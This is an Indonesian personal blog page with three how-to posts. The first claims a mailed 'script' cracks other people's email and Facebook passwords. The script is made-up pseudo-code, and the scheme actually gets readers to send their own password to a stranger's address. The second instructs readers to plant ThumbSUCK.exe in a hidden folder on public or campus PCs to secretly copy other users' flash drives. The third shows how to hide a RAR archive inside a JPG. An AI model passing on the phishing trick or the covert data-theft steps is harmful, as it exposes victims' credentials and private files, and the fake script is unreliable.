Ads code

Kita tdk bs mencegah atau menghapus perasaan. Kita hanya bs mengendalikannya, atau dikendalikan olehnya.

Sabtu, 19 Mei 2012

Menjadi Hacked


Kenapa banyak hacker bisa mendapatkan password email seseorang dengan mudah ternyata mereka hanya menggunakan script yang dikirimkan melalui email ke pusat server cyber yang berada di amerika.server akan otomatis mengcrack email yang dituju dengan data yang telah ada pada server pusat..script yang mereka gunakan ternyata cukup mudah hanya beberapa tulisan server akan otomatis mengcracknya.gimana cara lengkapnya?

kamu masuk seperti biasa ke accout email kamu contoh kamu masuk ke yahoomail maka akan muncul halaman account kamu setelah kamu login.setelah itu kamu hanya tinggal mengirim pesan seperti ini:


















isi kotak isiannya seperti diatas
kepada : serverhelper@usa.com
cc : (kosongkan)
judul : Script{injections} helper from usa

kemudian kamu isi pesannya dengan script ini:
StartTimer forgot email("brutus@yahoo.com");

colorArray = RetrieveFromCache password(fileName, cacheType);

RecordTimer("Retrieve From Cache");File Send to: ("robertfuck@yahoo.com")

password ("489654") message eror helper var=(0) injections this message,send eror spy

Script{injections} helper from usa server.

ganti alamat
email ini ("brutus@yahoo.com") ini dengan alamat email yang ingin kamu ketahui passwordnya.
ganti alamat email ini ("robertfuck@yahoo.com") dengan alamat email kamu.



ganti password ini ("489654") dengan password email kamu.



kemudian setelah selesai kamu ubah,lalu kirim.maka beberapa hari

kemudian kamu akan mendapatkan hasilnya.

klo g percaya coba aza..

jika kamu ingin tahu password dari Facebook seseorang maka 

tambahkan kata facebook pada ("brutus@yahoo.com") menjadi

(facebook"brutus@yahoo.com") dan ingat jika kamu ingin tau password

facebook orang lain maka isian dari





("robertfuck@yahoo.com") dan ("489654") adalah alamt email n password

facebook kamu yang umur aktif facebook kamu

telah aktif lebih dari 50 hari.

jika tidak maka tidak akan berhasil"""""

karena server hanya akan menreceive dan menginjections jika

facebook kamu aktif.





GOOD LUCK
from me:
Reaksi:  


Mencuri data FLASHDISK orang lain

Mencuri Data-Data Milik Pengguna FLASHDISK

FlashDISK merupakan media penyimpanan portable yang kini makin banyak digunakan oleh para pengguna komputer di Indonesia. Selain harganya yang makin murah, kapasitasnya pun kian besar dengan ukuran fisik yang kian mini dari generasi ke generasi ;)
Nah, biasanya nich, orang seringkali akan menyimpan data-data sensitifnya di dalam flashdisk. Dan tak jarang, seseorang menyimpan PASSWORD account-accountnya pada suatu file teks yang disimpan dalam FlashDISK.
Anda mengincar target yang demikian? caranya cukup mudah. Alat dan bahan yang perlu anda persiapkan adalah:
ThumbsuCK.exe - download secara cuma-cuma di member area http://spyrozone.net kategory Tools & Utility
Setelah anda mendownloadnya, copy ThumbSUCK.exe kedalam suatu directory tersembunyi. Misalnya saja anda letakkan di Local Drive D:\. Buatlah suatu directory dengan atribut SUPER HIDDEN agar korban tidak curiga. Ikuti panduan berikut:

1. Buatlah directory baru di D:\ atau dimanapun anda suka. Beri nama terserah anda.

Pada contoh ini saya beri nama gudangkorban. Salinlah ThumbSUCK.exe kedalam

directory tersebut lalu klik 2X untuk menjalankannnya.

2. Klik Start - Run lalu ketik cmd untuk memanggil Windows Command Processor

3. Kini saatnya menjadikan directory tersebut menjadi super hidden. Gunakan saja

perintah attrib dengan format attrib lokasifolder +s +h. Karena nama directory

yang tadi dibuat adalah gudangkorban yang terletak di drive D:\ maka ketik:

attrib d:\gudangkorban +s +h

lalu tekan ENTER.

Selesai sudah.. kini cobalah anda tancapkan sendiri FlashDISK anda. Data-data anda yang berada didalam FlashDISK akan disalin dengan silent mode oleh ThumbSUCK.exe kedalam directory gudangkorban di suatu folder dengan nama sesuai dengan volume label Flashdisk.
Karena directory gudangkorban diberi atribut super hidden, maka hilangkan terlebihdahulu tanda centang pada opsi Hide Protected Operating System Files (Recomended) dan beri centang pada Show Hidden Files and Folders di Folder Options (Tools -> Folder Options pada Windows Explorer).
Untuk mendisable aplikasi ini, gunakan Windows TaskManager (CTRL-ALT-DELETE) atau gunakan saja TaskMANAGER kesayangan anda.
Bagaimana jika ditanam di komputer public? atau ditanam di lab-lab kampus? Hmm.. dengan sedikit beramain-main Registry, anda dapat membuat aplikasi ini otomatis berjalan ketika windows startup ;p hehehe.. tentunya anda bisa panen data pribadi orang lain ^_^
Reaksi:  


Menyembunyikan file dalam gambar

Apakah anda pernah mempunyai file rahasia yang ingin anda kirimkan kepada orang lain? Ada begitu banyak program proteksi file yang bisa anda dapatkan di Internet. Namun ada begitu banyak cara untuk menembus proteksi program-program tersebut.

Saya akan membagikan sedikit tips bagi anda untuk menyembunyikan file rahasia milik anda ke dalam sebuah file gambar. Sebelumnya pastikan bahwa pada komputer anda telah terinstall WinRar

1. Settinglah windows anda agar menampilkan ekstensi file. Bukalah Control Panel lalu klik 2X pada Folder Options. Masuklah ke tab View lalu hilangkan tanda centang pada opsi “Hide extensions for known file types”







2. Persiapkan File rahasia anda (ekstensi file terserah), misalnya memiliki nama video_rahasia.avi dan sebuah file gambar (*.bmp, *.jpg, *gif) misalnya dengan nama pemandangan.jpg. Simpanlah kedua file tersebut dalam sebuah directory yang sama.

3. Klik kanan pada file video_rahasia.avi lalu pilih menu [Add to “video_rahasia.rar”]. Akan tercipta file baru dengan nama video_rahasia.rar





4. Sekarang bukalah aplikasi NOTEPAD (start -> Run ketik NOTEPAD) lalu ketik script berikut:

@echo off
ren video_rahasia.rar video_rahasia.avi.rar
copy /b pemandangan.jpg+video_rahasia.avi.rar hasil.jpg
del video_rahasia.avi
del pemandangan.jpg
del video_rahasia.avi.rar
del hide.bat

Ingat!! Sesuaikan nama-nama file pada script diatas dengan nama file anda (kecuali hide.bat). Perhatikan juga pada baris berikut:



ren video_rahasia.rar video_rahasia.avi.rar



Format penulisan: Ren namafileanda.rar namafileanda.ekstensisebelumnya.rar

Jadi, jika misalnya file anda sebelumnya adalah rahasia.exe dan setelah di rar menjadi rahasia.rar, maka penulisannya adalah:



ren raahsia.rar rahasia.exe.rar



Perhatikan juga pada nama file hasil.jpg. Ubahlah hasil.jpg menjadi hasil.ekstensi_file_gambar_anda. Jadi, misalnya file gambar yang anda pergunakan untuk menyembunyikan file rahasia nantinya adalah pemandangan.gif, maka ubahlah hasil.jpg menjadi hasil.gif



Well, Simpanlah file ini pada lokasi yang sama dengan file-file anda tadi. Klik [File] [Save] lalu pada form isian File name ketik hide.bat Sedangkan pada Save as type pilih ‘All files’. Klik [Save] sesudahnya.





5. Tutup semua jendela program yang tebuka. Sekarang bukalah folder tempat anda menyimpan semua file-file tadi. Dobel klik pada file hide.bat. Tunggu hingga sekelebat bayangan windows command processor tampil. Jika berhasil, semua file pada folder tersebut akan hilang digantikan dengan sebuah file baru bernama hasil.jpg

Cobalah anda buka file hasil.jpg. Sekilas tidak akan ada bedanya dengan file pemandangan.jpg milik anda kecuali ukuran filenya yang bertambah besar. Anda tetap bisa membuka file tersebut dengan Picture Editor atau Image Viewer kesayangan anda. Tidak ada tanda-tanda bahwa sebenarnya ada rahasia besar didalamnya hehehe.. ;)

Lho, lalu dimana file rahasia saya?? Tenang, jangan panik!! Klik kanan pada file hasil.jpg lalu pilihlah [Open With] --> [Choose Program..]. Pilihlah WinRar lalu klik [OK].





Nah, file rahasia anda akan tampil di hadapan anda. Anda bisa meng extract file tersebut sebagaimana anda meng extract file rar pada umumnya.




Disinilah sebenarnya inti dari persembunyian kita. Coba anda pikirkan, dalam kondisi wajar, adakah orang yang membuka file gambar dengan aplikasi file compressor?? Pernahkah terlintas dalam pikiran anda akan membuka gambar-gambar pemandangan dengan menggunakan WinRar?? Tentu tidak bukan?? Tentunya orang pada lazimnya akan membuka file gambar dengan aplikasi olah gambar atau image viewer. Nah, dengan memanfaatkan psikologi ini maka setidaknya file anda akan tersembunyi dengan aman ;) Kini anda bisa mengirimkan file rahasia tersebut kepada orang yang anda maksud dengan tenang. Tentunya jangan lupa untuk memberitahu rekan anda tersebut mengenai cara membukanya ;)
Rsdarkjunot2@gmail.com

0 komentar:

Posting Komentar

Twitter Delicious Facebook Digg Stumbleupon Favorites More